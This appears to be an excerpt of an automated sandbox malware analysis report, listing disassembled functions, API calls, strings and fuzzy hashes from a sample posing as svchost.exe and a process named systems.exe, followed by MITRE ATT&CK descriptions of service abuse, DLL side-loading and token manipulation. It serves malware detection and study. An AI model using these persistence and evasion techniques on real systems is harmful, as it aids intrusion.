Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FBA
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FC7
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FD4
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FF0
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(00000000), ref: 00416000
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00416016

___removelocaleref.LIBCMT ref: 004160D3

Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(004178FE), ref: 00416037
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83000001), ref: 00416044
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(B9C972C2), ref: 00416051
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B660AC2), ref: 0041605E
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 0041606B
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 00416087
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83C0B70F), ref: 00416097
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(000009B2), ref: 004160AD

___freetlocinfo.LIBCMT ref: 004160E7

Part of subcall function 00415E45: ___free_lconv_mon.LIBCMT ref: 00415E8B
Part of subcall function 00415E45: ___free_lconv_num.LIBCMT ref: 00415EAC
Part of subcall function 00415E45: ___free_lc_time.LIBCMT ref: 00415F31

Strings

x/B, xrefs: 004160DE

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: x/B
API String ID: 467427115-795736107
Opcode ID: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
Instruction ID: b34a0f9879d2699f7ffcf6201956a3b00b8b15cae77dc86b8d387886a1ceb3e8
Opcode Fuzzy Hash: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
Instruction Fuzzy Hash: C7E04F33B019315B8A36AE1D64406EB9A948FCA715F1B41AFF844A7784DF2CCCC154AD

Function 004098D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 004098D0

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498

Strings

32-bit, xrefs: 004098DB
2.24, xrefs: 004098E0
2014-08-31, xrefs: 004098D6

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConsoleFreeLocalWindow_vfwprintf
String ID: 2.24$2014-08-31$32-bit
API String ID: 1334155653-2354707097
Opcode ID: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
Instruction ID: c76862b1d953f522f71d38d82470cec42d68d54e25fb047d8ef406d997cf9da4
Opcode Fuzzy Hash: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
Instruction Fuzzy Hash: 01D0C2F0A8460137E600AA598C07F8B22409B8470DFC4006AB606A52D2D67CF8944A5D

Function 0041A8B3 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041A8E7
__isleadbyte_l.LIBCMT ref: 0041A91B
MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,?,00000000,00000000,?,?,?,?,00412F07), ref: 0041A94C
MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,00000001,00000000,00000000,?,?,?,?,00412F07), ref: 0041A9BA

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
Instruction ID: 8e80b7d0e863ddd762db141ba23fd8d99fbbd19addded7427a642c387e288d34
Opcode Fuzzy Hash: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
Instruction Fuzzy Hash: 54311370A12245EFDB20EF64C884AFE3BA4BF01310F1589AAE4619B291D334DDE1DB56

Function 0040D7E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

username, xrefs: 0040D863
get_service_username(), xrefs: 0040D85E

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: get_service_username()$username
API String ID: 0-1118073074
Opcode ID: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
Instruction ID: 7d16268e7706c02599106e4441dc23a9752c8f6b5ec33a58098762b0a8250c8b
Opcode Fuzzy Hash: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
Instruction Fuzzy Hash: DE1106B6A003015BE710EFA9EC85B9773A8EF84304F048476F91CDB381E379E8588768

Function 00405080 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 004050E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004050F1
HeapFree.KERNEL32(00000000), ref: 004050F8
SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 00405106

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: EnvironmentHeapVariable$FreeProcess
String ID:
API String ID: 1651283563-0
Opcode ID: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
Instruction ID: 7ca8f0decbef4ebefa15ff84fd483d82a394ef1ad15d6eda22774f96b67548aa
Opcode Fuzzy Hash: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
Instruction Fuzzy Hash: 26117F71C047169AD730AF549C0575BB3F8EF94310F54883BE989A72C1F3B898D48B9A

Function 00404EE0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000), ref: 00404F26
HeapAlloc.KERNEL32(00000000), ref: 00404F2D

Strings

copy_environment_block(), xrefs: 00404F3A
environment, xrefs: 00404F3F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID: copy_environment_block()$environment
API String ID: 1617791916-2686971372
Opcode ID: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
Instruction ID: 8deebacdc600d522f7aab138bb3d98dce45cd337f056f7d9729cf224169f9fdd
Opcode Fuzzy Hash: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
Instruction Fuzzy Hash: 1A01FCF66046221AD6212618BC50BF72298DFD0769B11443BFA82E71C5EA78CC8141A8

Function 00401469 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040147C
GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 00401491
LsaFreeMemory.ADVAPI32(00000000), ref: 004014F1
LsaFreeMemory.ADVAPI32(00000000), ref: 004014FB

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: AuthorityFreeMemory
String ID:
API String ID: 1444650384-0
Opcode ID: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
Instruction ID: 83e81ec0094bd32f467672ea939adaeb78c7e9f3249d369c250e79b353d34dd7
Opcode Fuzzy Hash: b8e15b337b3f1d921b3dea5c82a8250e1428588c6ab68d38df7715d8a68ab994
Instruction Fuzzy Hash: 81110675A043406FC310EB61C88596BB7E5FF89318F40093DF98997361D638DD91CB99

Function 00405680 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00405699
GetDesktopWindow.USER32 ref: 0040569F
GetWindowRect.USER32(00000000,?), ref: 004056AF
MoveWindow.USER32(?,?,?,00000000,?,00000000), ref: 004056E6

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Window$Rect$DesktopMove
String ID:
API String ID: 2894293738-0
Opcode ID: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
Instruction ID: 4404551d088f54b3b346c67006461702cb67daa45ea7307cd0df8ea8ccbf729a
Opcode Fuzzy Hash: 3fd5e5817b5a9b80783906beb4d0b9204ab218456916bf9286cc18b0c0424074
Instruction Fuzzy Hash: D5014FB1604212ABD704CE7CDD44EAFBBEDEBC8640F48492DB854D3284DB34E8058BA6

Function 00408870 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000002,?,?,?,?,00000000), ref: 0040888F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004088A2
SetEndOfFile.KERNEL32(00000000), ref: 004088AE
GetLastError.KERNEL32(00000000), ref: 004088BB

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: File$CreateErrorLastPointer
String ID:
API String ID: 2723331319-0
Opcode ID: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
Instruction ID: 5390559d92aa947b9314eb53a18356e94adec141a5a2c230ab48a642764cfde5
Opcode Fuzzy Hash: 4e0b794f19faba63de2e6a99d64c6716e3658fd301ade40050abe0956df1ca94
Instruction Fuzzy Hash: DBF0C8B66046107FE2109758AC0AF9F7768DFC4B24F50C539FA05E62D1D774DC4186BA

Function 00405870 Relevance: 6.0, APIs: 4, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000), ref: 0040587D
SendMessageW.USER32(00000000,?,0000000E,00000000), ref: 00405884
GetDlgItemTextW.USER32(00000000), ref: 00405898

Part of subcall function 004054A0: MessageBoxW.USER32(00000000,The message which was supposed to go here is missing!,NSSM,00000030), ref: 004054E4

_memset.LIBCMT ref: 004058BF

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ItemMessage$SendText_memset
String ID:
API String ID: 106090685-0
Opcode ID: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
Instruction ID: cb56df8b7445a31a75e8c4718e41db6c747a4df5fb1419ea8052b39527e82588
Opcode Fuzzy Hash: 6c1f17a3ed959549f23045dc7471758394cc86d8812c56315956d8aff6da2db9
Instruction Fuzzy Hash: A2F0A7B17003007BE120AB61DC8DF573B6CDF44B45F40441D7904D61D1D67CE900CE29

Function 0040D950 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

alloc_nssm_service(), xrefs: 0040D96C
service, xrefs: 0040D971

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$HeapSource$AllocDeregisterProcessRegisterReport
String ID: alloc_nssm_service()$service
API String ID: 1868725766-2157636798
Opcode ID: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
Instruction ID: 2c9525e28b5191ed34799dbcc002321da452954f880f3acf974e46df2d9dfe00
Opcode Fuzzy Hash: 8ea0d5565f999da2896c2c36d03efb47440df890c0c9d5ffe8b582c93dbb814f
Instruction Fuzzy Hash: FAD05EF5E8062027D61222A87C0AFDB25089750B56F528A71BE18F62C2D5A8884046AC

Function 00401A00 Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 00401A01
GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
GetCurrentProcessId.KERNEL32 ref: 00401A1A
FreeConsole.KERNEL32 ref: 00401A25

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConsoleProcessWindow$CurrentFreeThread
String ID:
API String ID: 3525601419-0
Opcode ID: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
Instruction ID: 2f1dd8984dbdf2ce013bee9d2ff09af7205948615cb30f205b3daea2ec8f1f74
Opcode Fuzzy Hash: 5629e28a465c767bbbe1bbf1bc2c58c11f9f367261ce32223375feb305a5a444
Instruction Fuzzy Hash: 13D09EB0B211019BD7147B75DD4C59A77B8EE44312750C579E852D11A0DB78D440CE39

Function 004067C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

GetDlgItemTextW.USER32(?,000003ED,00000002,00000100), ref: 004067EA

Strings

remove(), xrefs: 0040683A
service, xrefs: 0040683F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ItemText
String ID: remove()$service
API String ID: 3367045223-1317115628
Opcode ID: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
Instruction ID: 8184d59d72f0fbf905fa053582e3628f82c79463e423cb7eee217312d63cbccc
Opcode Fuzzy Hash: cc42bf898366cd54f4183dcd42ca600010007e7b9bb62e5b1c9b9d6a06996358
Instruction Fuzzy Hash: B021DEB3A4451032E112319DBC82FEF9258CB9076DF84803BF208F91C6E73D5A91419E

Function 00408750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040877C

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

set_createfile_parameter(), xrefs: 0040878A
%s%s, xrefs: 0040876E

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: %s%s$set_createfile_parameter()
API String ID: 2445375048-102671490
Opcode ID: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
Instruction ID: 3394c9dda24fa343ec2156a0d0e2bb01f682d842124ecdf63034fec8dba4f21e
Opcode Fuzzy Hash: 28d182d9b054d50c6284244cab05a53826a641f1a040c1f726e585f693a11305
Instruction Fuzzy Hash: 9701B1B26142002BD300A7598C42FAFB3E8ABC4314F80041EF515972C1F5B8A59587D7

Function 00401720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

LocalSystem, xrefs: 00401726

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID: LocalSystem
API String ID: 0-3718507506
Opcode ID: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
Instruction ID: 9109e31f7caa357bacc1ff475e9021cac7f2486fa8cfe9e055bed6058de38d4d
Opcode Fuzzy Hash: 2781d35c690fc2a676cfbd0f3a4b98b4639caa1f8c1be83308235997636d1291
Instruction Fuzzy Hash: BFF0B477B001206BDA105A55AC00BDBA3AC9B847A7F14003FF901E31E1E77C994282E9

Analysis Process: systems.exePID: 7504, Parent PID: 7340COMMON

Executed Functions

Function 00007FF706B914D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2582096108.00007FF706B91000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF706B90000, based on PE: true

Associated: 0000000F.00000002.2582068603.00007FF706B90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582551567.00007FF707182000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582570045.00007FF707183000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582636739.00007FF707188000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582670400.00007FF707192000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582884392.00007FF70735C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582884392.00007FF70736E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582884392.00007FF7075FB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2582884392.00007FF70767C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2583035300.00007FF70767D000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2583079395.00007FF70767E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2583101725.00007FF70767F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2583101725.00007FF707684000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.2583132468.00007FF70768A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff706b90000_systems.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e034127c26fa0395a53f703df2a15af482bb6d566b48f2a53d70d7614fb986c
Instruction ID: 6ec0f04e948924c0b49993f39a3231ebe5d91aa757f4acc3417fed1f800cf287
Opcode Fuzzy Hash: 8e034127c26fa0395a53f703df2a15af482bb6d566b48f2a53d70d7614fb986c
Instruction Fuzzy Hash: 76B0127190829790F3003F05EC813286230AF16741FD14030C80C03361DF3C54014730

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
